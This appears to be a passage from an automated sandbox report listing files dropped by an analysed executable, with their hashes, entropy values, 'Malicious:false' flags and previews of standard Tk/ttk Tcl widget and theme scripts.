                                                                                                                                                                                                                              SSDEEP:48:zVAqE3ZF8b4rXzsqAOAXsmCLFeNqkFeNXez:zLeU4bzSs1M
                                                                                                                                                                                                                              MD5:848A62BCF6ED3C16A8CFD26C43E1BC4E
                                                                                                                                                                                                                              SHA1:6F5E3EDF62716B511CF575BE2C6C997AFA2FA1E7
                                                                                                                                                                                                                              SHA-256:20EE6AD9D701709724292A926AF93C93784B254B48A656ECC140EF3A0FE10A11
                                                                                                                                                                                                                              SHA-512:AE78028EAF96E5B77DEFF0CD655360DB3A8058AC98B6753D9B77D629EDFFC582999A22A7075B9F5BA83EE65DA093E2CCB0EEAA4049898910D7AF517FDE60B28E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:#..# Bindings for ttk::panedwindow widget...#....namespace eval ttk::panedwindow {.. variable State.. array set State {...pressed 0.. .pressX.-...pressY.-...sash .-...sashPos -.. }..}....## Bindings:..#..bind TPanedwindow <Button-1> ..{ ttk::panedwindow::Press %W %x %y }..bind TPanedwindow <B1-Motion>..{ ttk::panedwindow::Drag %W %x %y }..bind TPanedwindow <ButtonRelease-1> .{ ttk::panedwindow::Release %W %x %y }....bind TPanedwindow <Motion> ..{ ttk::panedwindow::SetCursor %W %x %y }..bind TPanedwindow <Enter> ..{ ttk::panedwindow::SetCursor %W %x %y }..bind TPanedwindow <Leave> ..{ ttk::panedwindow::ResetCursor %W }..# See <<NOTE-PW-LEAVE-NOTIFYINFERIOR>>..bind TPanedwindow <<EnteredChild>>.{ ttk::panedwindow::ResetCursor %W }....## Sash movement:..#..proc ttk::panedwindow::Press {w x y} {.. variable State.... set sash [$w identify $x $y].. if {$sash eq ""} {.. .set State(pressed) 0...return.. }.. set State(pressed) .1.. set State(pressX) .$x.. set
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1138
                                                                                                                                                                                                                              Entropy (8bit):4.763501917862434
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:nJ8v3O0NSiio0pNFVkIks0ImxlnINgDImSgGINSyWghT:JFqS/o03fkxs0Rn+gD4v+S2F
                                                                                                                                                                                                                              MD5:DBF3BF0E8F04E9435E9561F740DFC700
                                                                                                                                                                                                                              SHA1:C7619A05A834EFB901C57DCFEC2C9E625F42428F
                                                                                                                                                                                                                              SHA-256:697CC0A75AE31FE9C2D85FB25DCA0AFA5D0DF9C523A2DFAD2E4A36893BE75FBA
                                                                                                                                                                                                                              SHA-512:D3B323DFB3EAC4A78DA2381405925C131A99C6806AF6FD8041102162A44E48BF166982A4AE4AA142A14601736716F1A628D9587E292FA8E4842BE984374CC192
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:#..# Ttk widget set: progress bar utilities...#....namespace eval ttk::progressbar {.. variable Timers.;# Map: widget name -> after ID..}....# Autoincrement --..#.Periodic callback procedure for autoincrement mode..#..proc ttk::progressbar::Autoincrement {pb steptime stepsize} {.. variable Timers.... if {![winfo exists $pb]} {.. .# widget has been destroyed -- cancel timer...unset -nocomplain Timers($pb)...return.. }.... set Timers($pb) [after $steptime \.. .[list ttk::progressbar::Autoincrement $pb $steptime $stepsize] ].... $pb step $stepsize..}....# ttk::progressbar::start --..#.Start autoincrement mode. Invoked by [$pb start] widget code...#..proc ttk::progressbar::start {pb {steptime 50} {stepsize 1}} {.. variable Timers.. if {![info exists Timers($pb)]} {...Autoincrement $pb $steptime $stepsize.. }..}....# ttk::progressbar::stop --..#.Cancel autoincrement mode. Invoked by [$pb stop] widget code...#..proc ttk::progressbar::stop {pb} {.. variabl
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2787
                                                                                                                                                                                                                              Entropy (8bit):4.795451191784129
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:IKADAzizZIcAlRqucObmn4AzyVN2AJyhAzukPNP:IHIBRqupmLSZkklP
                                                                                                                                                                                                                              MD5:F1C33CC2D47115BBECD2E7C2FCB631A7
                                                                                                                                                                                                                              SHA1:0123A961242ED8049B37C77C726DB8DBD94C1023
                                                                                                                                                                                                                              SHA-256:B909ADD0B87FA8EE08FD731041907212A8A0939D37D2FF9B2F600CD67DABD4BB
                                                                                                                                                                                                                              SHA-512:96587A8C3555DA1D810010C10C516CE5CCAB071557A3C8D9BD65C647C7D4AD0E35CBED0788F1D72BAFAC8C84C7E2703FC747F70D9C95F720745A1FC4A701C544
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# scale.tcl - Copyright (C) 2004 Pat Thoyts <patthoyts@users.sourceforge.net>..#..# Bindings for the TScale widget....namespace eval ttk::scale {.. variable State.. array set State {...dragging 0.. }..}....bind TScale <Button-1> { ttk::scale::Press %W %x %y }..bind TScale <B1-Motion> { ttk::scale::Drag %W %x %y }..bind TScale <ButtonRelease-1> { ttk::scale::Release %W %x %y }....bind TScale <Button-2> { ttk::scale::Jump %W %x %y }..bind TScale <B2-Motion> { ttk::scale::Drag %W %x %y }..bind TScale <ButtonRelease-2> { ttk::scale::Release %W %x %y }....bind TScale <Button-3> { ttk::scale::Jump %W %x %y }..bind TScale <B3-Motion> { ttk::scale::Drag %W %x %y }..bind TScale <ButtonRelease-3> { ttk::scale::Release %W %x %y }....## Keyboard navigation bindings:..#..bind TScale <<LineStart>> { %W set [%W cget -from] }..bind TScale <<LineEnd>> { %W set [%W cget -to] }....bind TScale <<PrevChar>> { ttk::scale::Increment %W -1 }..bin
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3285
                                                                                                                                                                                                                              Entropy (8bit):4.979174619784594
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:tyASEji8RYQ8FGD7BDos9Q1TBfvq/HKTh9lkHv8T/mAezeLEAAFULxZh4x:eIi8qFu2d11XlhfkPcczeLS4Zm
                                                                                                                                                                                                                              MD5:3FB31A225CEC64B720B8E579582F2749
                                                                                                                                                                                                                              SHA1:9C0151D9E2543C217CF8699FF5D4299A72E8F13C
                                                                                                                                                                                                                              SHA-256:6EAA336B13815A7FC18BCD6B9ADF722E794DA2888D053C229044784C8C8E9DE8
                                                                                                                                                                                                                              SHA-512:E6865655585E3D2D6839B56811F3FD86B454E8CD44E258BB1AC576AD245FF8A4D49FBB7F43458BA8A6C9DAAC8DFA923A176F0DD8A9976A11BEA09E6E2D17BF45
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:#..# Bindings for TScrollbar widget..#....namespace eval ttk::scrollbar {.. variable State.. # State(xPress).--.. # State(yPress).-- initial position of mouse at start of drag... # State(first).-- value of -first at start of drag...}....bind TScrollbar <Button-1> ..{ ttk::scrollbar::Press %W %x %y }..bind TScrollbar <B1-Motion>..{ ttk::scrollbar::Drag %W %x %y }..bind TScrollbar <ButtonRelease-1>.{ ttk::scrollbar::Release %W %x %y }....bind TScrollbar <Button-2> ..{ ttk::scrollbar::Jump %W %x %y }..bind TScrollbar <B2-Motion>..{ ttk::scrollbar::Drag %W %x %y }..bind TScrollbar <ButtonRelease-2>.{ ttk::scrollbar::Release %W %x %y }....# Redirect scrollwheel bindings to the scrollbar widget..#..# The shift-bindings scroll left/right (not up/down)..# if a widget has both possibilities..set eventList [list <MouseWheel> <Shift-MouseWheel>]..switch [tk windowingsystem] {.. aqua {.. lappend eventList <Option-MouseWheel> <Shift-Option-MouseWheel>.. }.. x11 {..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2503
                                                                                                                                                                                                                              Entropy (8bit):4.830288003879418
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:naLvMnAqeYQWYh7FvBrrbnMCfY/aVAbAigWAuFM0PfWAX20:nWQapprPnJY/8A8iRFdPtj
                                                                                                                                                                                                                              MD5:DD6A1737B14D3F7B2A0B4F8BE99C30AF
                                                                                                                                                                                                                              SHA1:E6B06895317E73CD3DC78234DD74C74F3DB8C105
                                                                                                                                                                                                                              SHA-256:E92D77B5CDCA2206376DB2129E87E3D744B3D5E31FDE6C0BBD44A494A6845CE1
                                                                                                                                                                                                                              SHA-512:B74AE92EDD53652F8A3DB0D84C18F9CE9069805BCAB0D3C2DBB537D7C241AA2681DA69B699D88A10029798D7B5BC015682F64699BA475AE6A379EEF23B48DAAF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:#..# Sizegrip widget bindings...#..# Dragging a sizegrip widget resizes the containing toplevel...#..# NOTE: the sizegrip widget must be in the lower right hand corner...#....switch -- [tk windowingsystem] {.. x11 -.. win32 {...option add *TSizegrip.cursor [ttk::cursor seresize] widgetDefault.. }.. aqua {.. .# Aqua sizegrips use default Arrow cursor... }..}....namespace eval ttk::sizegrip {.. variable State.. array set State {...pressed .0...pressX ..0...pressY ..0...width ..0...height ..0...widthInc.1...heightInc.1.. resizeX 1.. resizeY 1...toplevel .{}.. }..}....bind TSizegrip <Button-1> ..{ ttk::sizegrip::Press.%W %X %Y }..bind TSizegrip <B1-Motion> ..{ ttk::sizegrip::Drag .%W %X %Y }..bind TSizegrip <ButtonRelease-1> .{ ttk::sizegrip::Release %W %X %Y }....proc ttk::sizegrip::Press {W X Y} {.. variable State.... if {[$W instate disabled]} { return }.... set top [winfo toplevel $W].... # If the toplevel is not resi
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5003
                                                                                                                                                                                                                              Entropy (8bit):5.055050310142795
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:1qg/+yrjqA/K5ytxm1J1Ve6J1yQLUAzz/S76hrwxGGe2F:N/+yr2Gk1J1Ve6fxUAzDS76hrwxs2F
                                                                                                                                                                                                                              MD5:9C2833FAA9248F09BC2E6AB1BA326D59
                                                                                                                                                                                                                              SHA1:F13CF048FD706BBB1581DC80E33D1AAD910D93E8
                                                                                                                                                                                                                              SHA-256:DF286BB59F471AA1E19DF39AF0EF7AA84DF9F04DC4A439A747DD8BA43C300150
                                                                                                                                                                                                                              SHA-512:5FF3BE1E3D651C145950C3FC5B8C2E842211C937D1042173964383D4D59ECF5DD0EC39FF7771D029716F2D895F0B1A72591EF3BF7947FE64D4D6DB5F0B8ABFFB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:#..# ttk::spinbox bindings..#....namespace eval ttk::spinbox { }....### Spinbox bindings...#..# Duplicate the Entry bindings, override if needed:..#....ttk::copyBindings TEntry TSpinbox....bind TSpinbox <Motion>...{ ttk::spinbox::Motion %W %x %y }..bind TSpinbox <Button-1> ..{ ttk::spinbox::Press %W %x %y }..bind TSpinbox <ButtonRelease-1> .{ ttk::spinbox::Release %W }..bind TSpinbox <Double-Button-1> .{ ttk::spinbox::DoubleClick %W %x %y }..bind TSpinbox <Triple-Button-1> .{} ;# disable TEntry triple-click....bind TSpinbox <Up>...{ event generate %W <<Increment>> }..bind TSpinbox <Down> ...{ event generate %W <<Decrement>> }....bind TSpinbox <<Increment>>..{ ttk::spinbox::Spin %W +1 }..bind TSpinbox <<Decrement>> ..{ ttk::spinbox::Spin %W -1 }....ttk::bindMouseWheel TSpinbox ..[list ttk::spinbox::MouseWheel %W]....## Motion --..#.Sets cursor...#..proc ttk::spinbox::Motion {w x y} {.. variable State.. ttk::saveCursor $w State(userConfCursor) [ttk::cursor text].. if { [$w ide
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):10180
                                                                                                                                                                                                                              Entropy (8bit):4.886259798213254
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:FoTvMxHZZ1u2xj7+ZBHxjiXJv9IfwW+vr3UxjXEJDTF/MyLF3JcMzlsra2tYGa5P:mImAkRKYXMH59o4UbS30LWb
                                                                                                                                                                                                                              MD5:F705B3A292D02061DA0ABB4A8DD24077
                                                                                                                                                                                                                              SHA1:FD75C2250F6F66435444F7DEEF383C6397ED2368
                                                                                                                                                                                                                              SHA-256:C88B60FFB0F72E095F6FC9786930ADD7F9ED049EABC713F889F9A7DA516E188C
                                                                                                                                                                                                                              SHA-512:09817638DD3D3D5C57FA630C7EDF2F19C3956C9BD264DBF07627FA14A03AECD22D5A5319806E49EF1030204FADEF17C57CE8EAE4378A319AD2093321D9151C8F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:#..# ttk::treeview widget bindings and utilities...#....namespace eval ttk::treeview {.. variable State.... # Enter/Leave/Motion.. #.. set State(activeWidget) .{}.. set State(activeHeading) .{}.... # Press/drag/release:.. #.. set State(pressMode) .none.. set State(pressX)..0.... # For pressMode == "resize".. set State(resizeColumn).#0.... # For pressmode == "heading".. set State(heading) .{}..}....### Widget bindings...#....bind Treeview.<Motion> ..{ ttk::treeview::Motion %W %x %y }..bind Treeview.<B1-Leave>..{ #nothing }..bind Treeview.<Leave>...{ ttk::treeview::ActivateHeading {} {}}..bind Treeview.<Button-1> ..{ ttk::treeview::Press %W %x %y }..bind Treeview.<Double-Button-1> .{ ttk::treeview::DoubleClick %W %x %y }..bind Treeview.<ButtonRelease-1> .{ ttk::treeview::Release %W %x %y }..bind Treeview.<B1-Motion> ..{ ttk::treeview::Drag %W %x %y }..bind Treeview .<Up> ..{ ttk::treeview::Keynav %W up }..bind Treeview .<Down> ..{ ttk::treeview
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4993
                                                                                                                                                                                                                              Entropy (8bit):4.954034141173847
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:lfxukTy5jPTq8LIgF2diyNTNR6nkrn4ijSSvNigyJ5612HtZG835MSvWOTRsHWU:BM+y5jrq8G/2nkEijSSvNigyJ5612Htw
                                                                                                                                                                                                                              MD5:AF45B2C8B43596D1BDECA5233126BD14
                                                                                                                                                                                                                              SHA1:A99E75D299C4579E10FCDD59389B98C662281A26
                                                                                                                                                                                                                              SHA-256:2C48343B1A47F472D1A6B9EE8D670CE7FB428DB0DB7244DC323FF4C7A8B4F64B
                                                                                                                                                                                                                              SHA-512:C8A8D01C61774321778AB149F6CA8DDA68DB69133CB5BA7C91938E4FD564160ECDCEC473222AFFB241304A9ACC73A36B134B3A602FD3587C711F2ADBB64AFA80
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:#..# Ttk widget set initialization script...#....### Source library scripts...#....namespace eval ::ttk {.. variable library.. if {![info exists library]} {...set library [file dirname [info script]].. }..}....source -encoding utf-8 [file join $::ttk::library fonts.tcl]..source -encoding utf-8 [file join $::ttk::library cursors.tcl]..source -encoding utf-8 [file join $::ttk::library utils.tcl]....## ttk::deprecated $old $new --..#.Define $old command as a deprecated alias for $new command..#.$old and $new must be fully namespace-qualified...#..proc ttk::deprecated {old new} {.. interp alias {} $old {} ttk::do'deprecate $old $new..}..## do'deprecate --..#.Implementation procedure for deprecated commands --..#.issue a warning (once), then re-alias old to new...#..proc ttk::do'deprecate {old new args} {.. deprecated'warning $old $new.. interp alias {} $old {} $new.. uplevel 1 [linsert $args 0 $new]..}....## deprecated'warning --..#.Gripe about use of deprecated comman
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8624
                                                                                                                                                                                                                              Entropy (8bit):5.001791071900077
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:e0ebpSp+IZwnmTmpx8xzaHfw8K7LlJWQl8p7M+R5:rw0+WmpWxa/w9nlJHu
                                                                                                                                                                                                                              MD5:51086BC3315A4AE4A8591A654CFC3CEA
                                                                                                                                                                                                                              SHA1:2AC08309C63575B7A01FA62D3C262643CD8C823A
                                                                                                                                                                                                                              SHA-256:4AA041C050758B3331DC395381F7FBCE81E387908FC7A3C6107C4E7140F56F2E
                                                                                                                                                                                                                              SHA-512:6D69F7EAC9D5AF3B3EA85AE3E74BDFA6278789502D5E35EFE94349BFC543503BE7540D783D2632E349DD53F21074C702AC1FC487EE70C74234A08397F7238723
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:#..# Utilities for widget implementations...#....### Focus management...#..# See also: #1516479..#....## ttk::takefocus --..#.This is the default value of the "-takefocus" option..#.for ttk::* widgets that participate in keyboard navigation...#..# NOTES:..#.tk::FocusOK (called by tk_focusNext) tests [winfo viewable]..#.if -takefocus is 1, empty, or missing; but not if it's a..#.script prefix, so we have to check that here as well...#..#..proc ttk::takefocus {w} {.. expr {[$w instate !disabled] && [winfo viewable $w]}..}....## ttk::GuessTakeFocus --..#.This routine is called as a fallback for widgets..#.with a missing or empty -takefocus option...#..#.It implements the same heuristics as tk::FocusOK...#..proc ttk::GuessTakeFocus {w} {.. # Don't traverse to widgets with '-state disabled':.. #.. if {![catch {$w cget -state} state] && $state eq "disabled"} {...return 0.. }.... # Allow traversal to widgets with explicit key or focus bindings:.. #.. if {[regexp {Key|F
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):9710
                                                                                                                                                                                                                              Entropy (8bit):4.6639701588183895
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:BktY1F+qXd95WSZaHFHRE3GRKFh2oaoT/ezKpqvYMHab:V1F+cd95WSZuhRE34KbPmKmY2ab
                                                                                                                                                                                                                              MD5:0AA7F8B43C3E07F3A4DA07FC6DF9A1B0
                                                                                                                                                                                                                              SHA1:153AFB735B10BBA16CFBE161777232F983845D90
                                                                                                                                                                                                                              SHA-256:EC5F203C69DF390E9B99944CF3526D6E77DC6F68E9B1A029F326A41AFED1EF81
                                                                                                                                                                                                                              SHA-512:5406553211CD6714C98EF7765ABD46424CCB013343EFF693FDD3AE6E0AAE9B5983446E0E1CC706D6B2C285084BF83D397306D3D52028CBBCFB8F369857C5B69C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:#..# Settings for Microsoft Windows Vista and Server 2008..#....# The Vista theme can only be defined on Windows Vista and above. The theme..# is created in C due to the need to assign a theme-enabled function for..# detecting when themeing is disabled. On systems that cannot support the..# Vista theme, there will be no such theme created and we must not..# evaluate this script.....if {"vista" ni [ttk::style theme names]} {.. return..}....namespace eval ttk::theme::vista {.... ttk::style theme settings vista {.... .ttk::style configure . \... -background SystemButtonFace \... -foreground SystemWindowText \... -selectforeground SystemHighlightText \... -selectbackground SystemHighlight \... -insertcolor SystemWindowText \... -font TkDefaultFont \... ;.....ttk::style map "." \... -foreground [list disabled SystemGrayText] \... ;.....ttk::style configure TButton -anchor center -padding {1 1} -width -11...ttk::style configure TRadiobutton -padding 2...ttk::
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2865
                                                                                                                                                                                                                              Entropy (8bit):4.917847108902527
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:b69VhW2gL5FPVWRzQsVqrEuF3yYrf7rfJF8xUqBgLt6g3ktO5jo4+iZ6O2htYtCW:bbXl+CEqZNNSxU0Ht2MR7W
                                                                                                                                                                                                                              MD5:769C0719A4044F91E7D132A25291E473
                                                                                                                                                                                                                              SHA1:6FB07B0C887D443A43FB15D5728920B578171219
                                                                                                                                                                                                                              SHA-256:AE82BCCCE708FF9C303CBCB3D4CC3FF5577A60D5B23822EA79E3E07CCE3CBBD1
                                                                                                                                                                                                                              SHA-512:47FED061DDC6B4EB63EF77901D0094FF2EBB1BAFACB3F44FBF13FB59DEA1EC83985B2862086ECF1A7957819A88A0FAA144B35F16BEA9356BBD9775070D42E636
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:#..# Settings for 'winnative' theme...#....namespace eval ttk::theme::winnative {.. ttk::style theme settings winnative {.....ttk::style configure "." \... -background SystemButtonFace \... -foreground SystemWindowText \... -selectforeground SystemHighlightText \... -selectbackground SystemHighlight \... -fieldbackground SystemWindow \... -insertcolor SystemWindowText \... -troughcolor SystemScrollbar \... -font TkDefaultFont \... ;.....ttk::style map "." -foreground [list disabled SystemGrayText] ;.. ttk::style map "." -embossed [list disabled 1] ;.....ttk::style configure TButton \... -anchor center -width -11 -relief raised -shiftrelief 1...ttk::style configure TCheckbutton -padding "2 4"...ttk::style configure TRadiobutton -padding "2 4"...ttk::style configure TMenubutton \... -padding "8 4" -arrowsize 3 -relief raised.....ttk::style map TButton -relief {{!disabled pressed} sunken}.....ttk::style configure TEntry \... -padding 2 -select
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2103
                                                                                                                                                                                                                              Entropy (8bit):4.9805308941424355
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:aaiIu89VhW2gLRWJyO514rf+rfzxTrf/MW+iZ6O2htYtCp:XoXAk21nxQ7p
                                                                                                                                                                                                                              MD5:162F30D2716438C75EA16B57E6F63088
                                                                                                                                                                                                                              SHA1:3F626FF0496BB16B27106BED7E38D1C72D1E3E27
                                                                                                                                                                                                                              SHA-256:AEDB21C6B2909A4BB4686837D2126E521A8CC2B38414A4540387B801EBD75466
                                                                                                                                                                                                                              SHA-512:6EBF9648F1381D04F351BB469B6E3A38F3D002189C92EAF80A18D65632037FF37D34EC8814BBF7FAE34553645BFC13985212F24684EE8C4E205729B975C88C97
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:#..# Settings for 'xpnative' theme..#....namespace eval ttk::theme::xpnative {.... ttk::style theme settings xpnative {.....ttk::style configure . \... -background SystemButtonFace \... -foreground SystemWindowText \... -selectforeground SystemHighlightText \... -selectbackground SystemHighlight \... -insertcolor SystemWindowText \... -font TkDefaultFont \... ;.....ttk::style map "." \... -foreground [list disabled SystemGrayText] \... ;.....ttk::style configure TButton -anchor center -padding {1 1} -width -11...ttk::style configure TRadiobutton -padding 2...ttk::style configure TCheckbutton -padding 2...ttk::style configure TMenubutton -padding {8 4}.....ttk::style configure TNotebook -tabmargins {2 2 2 0}...ttk::style map TNotebook.Tab \... -expand [list selected {2 2 2 2}].....ttk::style configure TLabelframe.Label -foreground "#0046d5".....# OR: -padding {3 3 3 6}, which some apps seem to use....ttk::style configure TEntry -padding {2 2 2 4}...ttk::
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):10521
                                                                                                                                                                                                                              Entropy (8bit):5.0647027375963996
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:1Y3uWEXm/swEePmJhRAXd1hTHsHG2ML/9Lm2daM0Hu:8hodMiM0Hu
                                                                                                                                                                                                                              MD5:508F7E258C04970FAE526990168CB773
                                                                                                                                                                                                                              SHA1:33785204B18C0E0F5CDCB5B49399B5907351FDB8
                                                                                                                                                                                                                              SHA-256:B463B366F139DDF7FED31F34C6D2341F9F27845A1A358011DFC801E1333B1828
                                                                                                                                                                                                                              SHA-512:A12985B58DD1D46297119CED47B7F44EF4139CED6C36FD028E66DD657E5ED0663B744C679A5BF7A39B39D17A32E1280D2945F6B9AD59AEF20436F68040F6070C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# unsupported.tcl --..#..# Commands provided by Tk without official support. Use them at your..# own risk. They may change or go away without notice...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES.....# ----------------------------------------------------------------------..# Unsupported compatibility interface for folks accessing Tk's private..# commands and variable against recommended usage...# ----------------------------------------------------------------------....namespace eval ::tk::unsupported {.... # Map from the old global names of Tk private commands to their.. # new namespace-encapsulated names..... variable PrivateCommands.. array set PrivateCommands {...tkButtonAutoInvoke..::tk::ButtonAutoInvoke...tkButtonDown...::tk::ButtonDown...tkButtonEnter...::tk::ButtonEnter...tkButtonInvoke...::tk::ButtonInvoke...tkButtonLeave...::tk::ButtonLeave...tkButtonUp...::tk::ButtonUp...tk
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):26991
                                                                                                                                                                                                                              Entropy (8bit):4.974180990171971
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:0BLzjXhss64XKNFXm39QJ63nwFiHLgRIdNPCRE5phLtffsNP4XWdxWk+I5oP9jNR:0BvjXoFCB3flLCRE5phLCP3xWq8vWTod
                                                                                                                                                                                                                              MD5:FA99EF44FAA88A6BA1967A1257DEB97B
                                                                                                                                                                                                                              SHA1:CC99DBF678F4169A90ACC5A89C6F8DAB48052EC6
                                                                                                                                                                                                                              SHA-256:C4722EADEDE763FA52E7937D40067B0F8EB86B7A4B707F90212ED3E5289690D0
                                                                                                                                                                                                                              SHA-512:3AF16095784908A444CD61EEF178A30B9FED9C20AA91D94044A3AECB6047267FB80BCE790FC1F28FB19AEF664A6618FD832612F541FDADCC34B6C01E92E5EA40
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# xmfbox.tcl --..#..#.Implements the "Motif" style file selection dialog for the..#.Unix platform. This implementation is used only if the..#."::tk_strictMotif" flag is set...#..# Copyright (c) 1996 Sun Microsystems, Inc...# Copyright (c) 1998-2000 Scriptics Corporation..#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES.....namespace eval ::tk::dialog {}..namespace eval ::tk::dialog::file {}......# ::tk::MotifFDialog --..#..#.Implements a file dialog similar to the standard Motif file..#.selection box...#..# Arguments:..#.type.."open" or "save"..#.args..Options parsed by the procedure...#..# Results:..#.When -multiple is set to 0, this returns the absolute pathname..#.of the selected file. (NOTE: This is not the same as a single..#.element list.)..#..#.When -multiple is set to > 0, this returns a Tcl list of absolute..# pathnames. The argument for -multiple is ignored, but for consistency..#
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):66328
                                                                                                                                                                                                                              Entropy (8bit):6.295486583134031
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:dGpS27sIvGJdk7YeY7S81CpnHcKWlI1OSs7Sy+xe:gpVp7xKSppnHcFlI1OSsz
                                                                                                                                                                                                                              MD5:E38A6B96F5CC200F21DA22D49E321DA3
                                                                                                                                                                                                                              SHA1:4EA69D2B021277AB0B473CFD44E4BFD17E3BAC3B
